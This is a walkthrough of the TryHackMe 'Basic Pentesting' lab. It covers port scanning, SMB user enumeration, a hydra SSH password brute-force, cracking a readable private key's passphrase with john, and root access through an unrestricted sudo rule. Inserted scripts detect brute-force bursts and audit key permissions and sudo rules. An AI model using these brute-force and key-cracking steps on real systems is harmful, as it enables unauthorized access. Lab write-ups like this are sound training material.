THM Basic Pentesting WriteUp
Basic Pentesting Skills
Basic Pentesting is an easy Linux machine where we will use the following skills:
- Port Discovery
- Web Fuzzing
- Samba User Enumeration
- SSH Password Brute-Force
- Cracking SSH Key
- Sudoers Abusing
IP Address Enumeration
Using the usual nmap scan I discovered that ports 22, 80, 139, 445, 8009 and 8080 are open:
```
❯ nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.220.168 -oG allPorts
Nmap scan report for 10.10.220.168
Host is up, received user-set (0.10s latency).
Scanned at 2024-12-12 01:50:27 CET for 17s
Not shown: 64883 closed tcp ports (reset), 646 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE      REASON
22/tcp   open  ssh          syn-ack ttl 63
80/tcp   open  http         syn-ack ttl 63
139/tcp  open  netbios-ssn  syn-ack ttl 63
445/tcp  open  microsoft-ds syn-ack ttl 63
8009/tcp open  ajp13        syn-ack ttl 63
8080/tcp open  http-proxy   syn-ack ttl 63
```
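The grepable report written by -oG is what makes the two-step scan above convenient: the first pass finds the open ports and the second pass runs scripts only against those. The helper below, added here as an example and not part of the original writeup, extracts the open ports and the host from a -oG file and builds the follow-up command. The sample report it writes is constructed to match the port list above; the function names are my own.

```shell
#!/bin/sh
# Turn an nmap grepable (-oG) report into the "-p" list the targeted
# scan needs. Added example; the sample below is constructed, not the
# real allPorts file from the writeup.

# write_sample FILE -> writes a constructed -oG report for the host above
write_sample() {
    cat > "$1" <<'EOF'
# Nmap 7.94SVN scan initiated Thu Dec 12 01:50:27 2024 as: nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.220.168 -oG allPorts
Host: 10.10.220.168 ()  Status: Up
Host: 10.10.220.168 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 8009/open/tcp//ajp13///, 8080/open/tcp//http-proxy///  Ignored State: closed (64883)
# Nmap done at Thu Dec 12 01:50:44 2024 -- 1 IP address (1 host up) scanned in 17.07 seconds
EOF
}

# extract_ports FILE -> "22,80,139,445,8009,8080"
# Every open port appears as "<port>/open/" in the Ports: field; the
# comment lines never contain that pattern, so a single grep is enough.
extract_ports() {
    grep -oE '[0-9]+/open/' "$1" | cut -d/ -f1 | sort -n -u | paste -s -d ',' -
}

# extract_host FILE -> first host address in the report
extract_host() {
    grep -oE '^Host: [0-9.]+' "$1" | head -n 1 | cut -d' ' -f2
}

# build_targeted_cmd FILE -> the script/version scan to run next
build_targeted_cmd() {
    printf 'nmap -sCV -p%s %s -oN targeted\n' \
        "$(extract_ports "$1")" "$(extract_host "$1")"
}

# Usage: sh allports.sh allPorts   (prints the follow-up scan command)
if [ "$#" -eq 1 ]; then
    build_targeted_cmd "$1"
fi
```

The port list is sorted and de-duplicated before it is joined, so the same helper works on a report that contains several hosts or several lines per host.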
Then I launched the default script set (-sC) and version detection (-sV) against the open ports to gather more info:
```
❯ nmap -sCV -p22,80,139,445,8009,8080 10.10.220.168 -oN targeted
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-12 01:52 CET
Nmap scan report for 10.10.220.168
Host is up (0.093s latency).
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-12-12T00:52:16
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2024-12-11T19:52:16-05:00
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
```
So we have to check the following ports & services:
- Port 22 –> SSH 7.2p2
- Port 80 –> Apache 2.4.18
- Port 445 –> Samba 4.3.11
- Port 8009 –> Apache Jserv
- Port 8080 –> Apache Tomcat 9.0.7
Let’s start with the Apache service.
Port 80 Enumeration
First I ran whatweb to fingerprint the versions and technologies used by the website:
```
❯ whatweb 10.10.220.168
http://10.10.220.168 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.220.168]
```
Nothing fancy, so I took a look at the website itself. Opening http://10.10.220.168 we are greeted by a page under maintenance.
Nothing in the source code either, so I ran a directory brute-force with gobuster:
```
❯ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.220.168 -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.220.168
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 297]
/.htaccess            (Status: 403) [Size: 297]
/development          (Status: 301) [Size: 320] [--> http://10.10.220.168/development/]
/server-status        (Status: 403) [Size: 301]
Progress: 20478 / 20479 (100.00%)
===============================================================
Finished
===============================================================
```
I found a directory named development with two text files inside, dev.txt and j.txt:
dev.txt:
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
j.txt:
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
Seems like someone named "J" has a weak password. We will keep this in mind in case we find a user named J or something similar.
Port 8080 Enumeration
After finding nothing more on port 80, I checked the Apache Tomcat service on port 8080, but there was nothing there either, just the default Tomcat page.
Port 445 Enumeration
Next I scanned the Samba service, starting with an nmap scan that runs most of the SMB scripts Nmap gives us:
```
❯ nmap -p139,445 --script="smb-vuln*,smb-enum*" 10.10.220.168 -oN smbScan
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-061: false
```
The only finding is a denial-of-service vulnerability, which won't get us a shell, so let's keep scanning.
I ran enum4linux looking for users and other valuable info, and after a while it found two users:
```
==================( Users on 10.10.220.168 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
```
We found the following users:
- User 0 —> kay
- User 1 —> jan
I figured that the "J" from j.txt is jan, so knowing his password is weak I first tried brute-forcing the Apache Tomcat login, but after trying some wordlists it didn't work, so I moved on to brute-forcing the SSH service.
Port 22
I started the brute-force with hydra and let it run to completion:
```
hydra -l jan -P /usr/share/seclists/Passwords/probable-v2-top12000.txt ssh://10.10.220.168 -t 4
```
After a while it found the following credentials:
```
[22][ssh] host: 10.10.220.168   login: jan   password: armando
```
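From the other side of the wire, a hydra run like the one above leaves a very recognisable trace in the target's auth log: a burst of "Failed password" lines from one source, often ending in an "Accepted password" for the same user. The script below, added here as an example and not part of the original writeup, counts failures per source address over a constructed sample of sshd log lines and flags sources that exceed a threshold and then logged in successfully. The sample lines, the source addresses and the function names are my own.

```shell
#!/bin/sh
# Detect an SSH password-guessing burst in sshd log lines.
# Added example; the log lines below are constructed, not taken from
# the target machine.

# write_auth_sample FILE -> constructed /var/log/auth.log excerpt
write_auth_sample() {
    cat > "$1" <<'EOF'
Dec 12 02:10:01 basic2 sshd[1201]: Failed password for jan from 10.10.14.5 port 51210 ssh2
Dec 12 02:10:02 basic2 sshd[1203]: Failed password for jan from 10.10.14.5 port 51212 ssh2
Dec 12 02:10:02 basic2 sshd[1205]: Failed password for invalid user jen from 10.10.14.5 port 51214 ssh2
Dec 12 02:10:03 basic2 sshd[1207]: Failed password for jan from 10.10.14.5 port 51216 ssh2
Dec 12 02:10:03 basic2 sshd[1209]: Failed password for jan from 10.10.14.5 port 51218 ssh2
Dec 12 02:10:04 basic2 sshd[1211]: Accepted password for jan from 10.10.14.5 port 51220 ssh2
Dec 12 02:15:40 basic2 sshd[1300]: Failed password for kay from 192.168.56.102 port 40022 ssh2
Dec 12 02:16:01 basic2 sshd[1302]: Accepted publickey for kay from 192.168.56.102 port 40024 ssh2
EOF
}

# failed_by_source FILE -> "<count> <ip>" per source, most failures first
failed_by_source() {
    grep 'sshd\[' "$1" | grep 'Failed password' \
        | sed -E 's/.* from ([0-9.]+) port .*/\1/' \
        | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

# flag_bruteforce FILE THRESHOLD -> one line per source with at least
# THRESHOLD failures, noting whether a login from it later succeeded
# (the dots in the address are treated as regex wildcards by grep,
# which is acceptable for a log triage helper).
flag_bruteforce() {
    failed_by_source "$1" | while read -r n ip; do
        [ "$n" -ge "$2" ] || continue
        if grep -q "Accepted .* from $ip port" "$1"; then
            echo "$ip $n failures then successful login"
        else
            echo "$ip $n failures"
        fi
    done
}

# Usage: sh sshburst.sh /var/log/auth.log 10
if [ "$#" -eq 2 ]; then
    flag_bruteforce "$1" "$2"
fi
```

A "failures then successful login" line is the one worth paging on: a plain burst of failures is noise from the internet, but a burst that ends in an accepted password means a guessable credential was in use, exactly the situation the j.txt note warned about.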
Shell as Jan
With valid credentials in hand, I logged in via SSH:
```
❯ ssh jan@10.10.220.168
jan@basic2:~$
```
I tried the usual privesc checks (id, sudo -l, SUID binaries, etc.) but didn't find anything, so I looked inside kay's home directory and found that his id_rsa is readable by other users. I transferred it to my machine and tried to log in with it:
```
❯ chmod 600 id_rsa
❯ ssh -i id_rsa kay@10.10.220.168
Enter passphrase for key 'id_rsa':
```
But the key is protected by a passphrase, so we have to crack it. First we convert the id_rsa into a format john understands, using ssh2john:
```
ssh2john id_rsa > hash
```
After converting it, we can crack the passphrase with john:
```
❯ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (id_rsa)
1g 0:00:00:00 DONE (2024-12-12 03:05) 3.030g/s 250763p/s 250763c/s 250763C/s behlat..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
We found a valid passphrase, beeswax, so let’s log in as Kay:
```
❯ ssh -i id_rsa kay@10.10.220.168
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$
```
Shell as Kay
This part is easy: there is a password backup in kay's home directory, and opening the file gives us kay's password:
```
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
```
With the password we run sudo -l to check our sudo privileges, and it turns out we can run any binary as root:
```
kay@basic2:~$ sudo -l
Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL
```
So we just run sudo su and provide kay's password to get a root shell:
```
kay@basic2:~$ sudo su
root@basic2:/home/kay#
```
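The whole privesc chain on this box rests on three misconfigurations that an administrator could have caught with a periodic check: a private key readable by other users, a plaintext password backup in a home directory, and an unrestricted sudo rule. The audit script below, added here as an example and not part of the original writeup, walks a directory tree for other-readable private keys and credential-looking files, and flags sudo rules that grant every command. The fixture it builds is constructed to mirror the findings above (a readable id_rsa and pass.bak under kay, a correctly locked-down key under jan) and the sudo sample reproduces the sudo -l output shown; the function names are my own.

```shell
#!/bin/sh
# Audit home directories and sudo rules for the weaknesses used above.
# Added example; the fixture and sudo sample are constructed.

# make_fixture DIR -> constructed home directories: kay leaks, jan does not
make_fixture() {
    mkdir -p "$1/kay/.ssh" "$1/jan/.ssh"
    printf -- '-----BEGIN RSA PRIVATE KEY-----\nconstructed\n-----END RSA PRIVATE KEY-----\n' > "$1/kay/.ssh/id_rsa"
    printf 'ssh-rsa AAAA constructed\n' > "$1/kay/.ssh/id_rsa.pub"
    printf 'constructed-backup-password\n' > "$1/kay/pass.bak"
    printf -- '-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed\n-----END OPENSSH PRIVATE KEY-----\n' > "$1/jan/.ssh/id_rsa"
    chmod 644 "$1/kay/.ssh/id_rsa" "$1/kay/.ssh/id_rsa.pub" "$1/kay/pass.bak"
    chmod 600 "$1/jan/.ssh/id_rsa"
}

# audit_home DIR -> one finding per other-readable private key or
# credential-looking file. A key is recognised by its PEM header, not
# its name, so public keys (also readable, harmless) are not reported.
audit_home() {
    find "$1" -type f -perm -004 | while IFS= read -r f; do
        if head -n 1 "$f" 2>/dev/null | grep -q 'PRIVATE KEY-----'; then
            echo "PRIVATE KEY readable by others: $f"
        else
            case "$(basename "$f")" in
                *.bak|*pass*|*cred*) echo "POSSIBLE CREDENTIAL FILE readable by others: $f" ;;
            esac
        fi
    done
}

# write_sudo_sample FILE -> the sudo -l output from the writeup
write_sudo_sample() {
    cat > "$1" <<'EOF'
Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL
EOF
}

# flag_unrestricted_sudo FILE -> rules of the form "(...) ALL" or
# "(...) NOPASSWD: ALL", i.e. any-command grants, from saved sudo -l output
flag_unrestricted_sudo() {
    grep -E '^[[:space:]]*\([^)]*\)[[:space:]]*(NOPASSWD:[[:space:]]*)?ALL[[:space:]]*$' "$1"
}

# Usage: sh homeaudit.sh /home
if [ "$#" -eq 1 ]; then
    audit_home "$1"
fi
```

The fixes are the ones the findings imply: chmod 600 on private keys (ssh itself refuses keys with looser permissions, which is why the writeup had to chmod the copied key before using it), no plaintext password files in home directories, and sudo rules scoped to the specific commands a user needs rather than ALL.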
The flag is waiting in root's home directory:
```
root@basic2:/home/kay# cd
root@basic2:~# ls
flag.txt
root@basic2:~# cat flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain
a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send
me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach
out to me.

Happy hacking!
root@basic2:~#
```
Thanks for reading, I'd appreciate it if you took a look at my other posts :)